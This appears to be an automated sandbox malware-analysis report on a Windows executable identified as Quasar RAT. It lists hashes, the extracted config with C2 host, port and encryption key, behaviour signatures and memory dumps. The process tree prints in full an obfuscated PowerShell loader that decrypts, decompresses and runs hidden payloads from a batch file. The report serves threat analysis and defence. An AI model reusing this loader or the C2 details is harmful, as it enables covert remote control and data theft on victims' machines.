Overview

overview

10

Static

static

3

95ac49ea8c...05.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-05-2024 01:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    95ac49ea8ca4c65c807bdd666ce103b3c37ba995e8bab38d705ddacb88f50305.exe

  • Size

    1.3MB

  • MD5

    96b4cf51bebab4887e19e4130ba179a8

  • SHA1

    4366099721910192416f6df074659750fbd32d70

  • SHA256

    95ac49ea8ca4c65c807bdd666ce103b3c37ba995e8bab38d705ddacb88f50305

  • SHA512

    bd7498feeda13f37f06cc020b1ae373464994fa7de87666d7fe378f07d1d73dc67517546d2c0300be8e89ddaa6b4be67ad7130e59a19ebb63bba781539f210b3

  • SSDEEP

    24576:mOyKHIdpTrwV7PF+hJZZYnm/d7u1o1Uwtl4CHvPos0Fl11Aapp+QX4:kKHerwV7PFqJZZem/Ru1YJrHHos0Fl34

Score
10/10
quasaroffice04executionpersistencespywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

bin-inspections.gl.at.ply.gg:64055

Mutex

536deaa9-57d2-448a-ae01-b604426d7fa6

Attributes
  • encryption_key

    DBB529B3F56F6D23695F8D7AC9BA28484A0D6D0F

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 1 IoCs
  • Detects Windows executables referencing non-Windows User-Agents 1 IoCs
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 1 IoCs
  • Detects executables containing common artifacts observed in infostealers 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\95ac49ea8ca4c65c807bdd666ce103b3c37ba995e8bab38d705ddacb88f50305.exe
    "C:\Users\Admin\AppData\Local\Temp\95ac49ea8ca4c65c807bdd666ce103b3c37ba995e8bab38d705ddacb88f50305.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1504
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c "ss.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:224
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mDHQiqaxkPSIkUJjeK9VeGyeprb6IbmzH8wtto3wMy4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Okmn0RiYazMVRAAXAxWvGA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pgmGM=New-Object System.IO.MemoryStream(,$param_var); $aBSZN=New-Object System.IO.MemoryStream; $HBAzE=New-Object System.IO.Compression.GZipStream($pgmGM, [IO.Compression.CompressionMode]::Decompress); $HBAzE.CopyTo($aBSZN); $HBAzE.Dispose(); $pgmGM.Dispose(); $aBSZN.Dispose(); $aBSZN.ToArray();}function execute_function($param_var,$param2_var){ $WhTBN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QkQAf=$WhTBN.EntryPoint; $QkQAf.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ss.bat';$vfbWj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ss.bat').Split([Environment]::NewLine);foreach ($VTRqO in $vfbWj) { if ($VTRqO.StartsWith(':: ')) { $YFMNq=$VTRqO.Substring(3); break; }}$payloads_var=[string[]]$YFMNq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:4036

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ss.bat
    Filesize

    1.6MB

    MD5

    29b8fa29e4669712c3c7b982090a9417

    SHA1

    ad448763903c5bdb4769c2f4ad070c2363226d87

    SHA256

    f4d53fe665fed6b7a4ad42d132231acbecb21f62c64ef0fdbd4b968ef11553b9

    SHA512

    6f52a3d6b21cab1bf0ab5d781a59c04eacba6e30ffb8c2d30a1b348c96eeb7369cb9ee678bb33bc49362a6de4982b2ed5444dc45deab58a60106238534811721

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ynkh2jqo.zxr.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/4036-16-0x000001D5F90F0000-0x000001D5F90F8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/4036-6-0x000001D5F8EA0000-0x000001D5F8EC2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4036-10-0x00007FFE82D90000-0x00007FFE83851000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4036-15-0x00007FFE82D90000-0x00007FFE83851000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4036-3-0x00007FFE82D93000-0x00007FFE82D95000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4036-17-0x000001D5F91A0000-0x000001D5F92D0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/4036-18-0x000001D5F92D0000-0x000001D5F95F4000-memory.dmp

    Filesize

    3.1MB

    Download

  • memory/4036-19-0x00007FFE82D90000-0x00007FFE83851000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4036-20-0x000001D5F9F30000-0x000001D5F9F80000-memory.dmp

    Filesize

    320KB

    Download

  • memory/4036-21-0x000001D5FA040000-0x000001D5FA0F2000-memory.dmp

    Filesize

    712KB

    Download

  • memory/4036-22-0x000001D5FA2D0000-0x000001D5FA492000-memory.dmp

    Filesize

    1.8MB

    Download

  • memory/4036-23-0x00007FFE82D90000-0x00007FFE83851000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4036-24-0x00007FFE82D93000-0x00007FFE82D95000-memory.dmp

    Filesize

    8KB

    Download